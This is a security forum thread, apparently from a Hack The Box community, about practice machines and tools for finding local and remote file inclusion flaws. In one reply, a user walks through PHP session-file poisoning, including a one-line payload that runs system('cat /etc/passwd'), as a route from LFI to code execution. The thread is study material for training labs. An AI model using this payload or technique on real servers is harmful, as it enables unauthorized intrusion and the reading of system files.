LFI / RFI boxes

Hey there,

Can anyone list some boxes that are good for finding / exploiting LFI and RFI?

Being able to recognize these in web apps is my weak point.

Also, any pointers on how to notice when an LFI vulnerability could be present?


I am currently writing a program that can do that and I would have no problem explaining a little bit I have learned about what to look for how to detect and what basic tests my code will do I am also putting a short timeline on this code I should have ready in a week or so for people to try out so if You want to chat just hit me up i am up late working on these and all my friends are sleeping :wink:

when you have ?page= ?language=
you could also Kadimus

but dont trust too much Kadimus

1 Like

Thanks wabafet - cant wait to try it out
peek -thanks for the 2 points. Also, trying kadimus now. After playing more with the pwk coursework example i have a better grasp.

Thanks again

Just saw this thread and in case anyone find it useful, a few months ago I created a small tool to make the process of finding and exploiting file inclusion and directory traversal vulnerabilities a bit easier. It’s still under development and you can find it here:

1 Like

thanks, I will test it

Thanks game0ver, i will give this a spin!
On a side note, just recieved the email i passed my oscp exam today!

Cheers and thanks to everyone on HTB!

Congrats @mxz3n !
Thanks guys for trying out my tool. It’s still under development so feedback is much appreciated!

LFI: Lacasadepapel
RFI: Help

I will admit that is pretty cool game0ver

Ok, I have a question here
say we know that from a method we can inject code into the session variable which I have learned that by default php5 does this

var/lib/php5/sess_infoforsession → the actual session file that is stored server side

my question here is say I do this

<?php system("cat /etc/passwd");?>


that ends up in the session file than i Want to do this once I verify the lfi


I will include the session file that is stored on the server and because it is valid php will execute and give me back the info I need from the /etc/pass file

But what I want to know is how does this happen is it because the lang parameter is doing an include and when it finds php file we included only the actual code in the file that is php will execute allowing for us to get RCE?

otherwise how does all the other stuff in the session file not break it?

From my limited knowledge it seems to me that if we have a valid include and the programmer leaves and LFI up for grabs but we cant seem to get RCE , We can resort if it is php5 to see if we can store the info inside of the session file server side like with apache log injection?

awesome, thank you